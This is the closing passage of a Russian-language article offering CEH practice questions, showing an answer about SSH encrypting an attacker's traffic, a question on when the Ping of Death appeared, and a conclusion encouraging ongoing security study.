Ответ A. SSH шифрует весь трафик. Если злоумышленник использует SSH, вы не сможете увидеть, что он делает, но это не является преимуществом ни для кого, кроме злоумышленника.

20. В каком году впервые появился “Пинг смерти”?

A. 1992

B. 1989

C. 1990

D. 1996

Ответ D. Ping of Death впервые появился в 1996 году из-за того, что приложения неправильно интерпретировали пакеты большого размера.

Заключение

В данной статье мы привели лишь малую часть вопросов по CEH. Как можно заметить объем зананий для успешного ответа на все вопросы должен быть весьма богатым. Так, что саморазвите в ИБ должно быть постоянным процессом.

Делимся своими результатами в комментариях

 



2021-10-19T11:34:25
Аудит ИБ